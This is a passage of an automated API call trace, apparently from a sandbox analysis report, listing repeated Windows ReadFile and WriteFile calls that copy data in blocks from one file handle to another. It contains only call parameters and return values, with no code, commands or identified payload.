lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.101] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.102] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.102] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.103] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.103] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.104] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.105] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1c1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.105] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.106] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x228, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.106] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.107] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x237, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.107] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.108] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.108] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.109] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.109] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.110] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.110] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.111] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.112] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.112] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.113] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.113] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.114] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x247, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.114] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.115] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.115] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.116] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.116] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.117] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x8d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.117] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x204, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.119] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.119] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.120] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1df, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.120] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x21a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.121] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ea, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.122] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.123] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ef, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.123] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.124] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.124] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.125] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.125] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.126] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.126] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.127] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.128] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.128] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.129] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.130] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ef, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.130] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.131] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ed, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.131] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.132] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ed, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.132] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.133] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1e8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.133] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.134] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.135] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.136] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.137] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1eb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.137] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.138] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1f9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.138] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.139] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.140] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.140] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.141] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.141] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.142] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.142] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.143] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.143] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.144] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.144] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.145] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.146] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.147] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.147] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.148] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.148] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.149] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.149] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.150] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, 